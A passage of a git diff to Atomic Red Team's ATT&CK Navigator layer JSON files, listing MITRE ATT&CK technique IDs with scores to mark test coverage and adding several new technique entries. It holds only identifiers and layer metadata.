ueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 98af3792..1640b82b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueI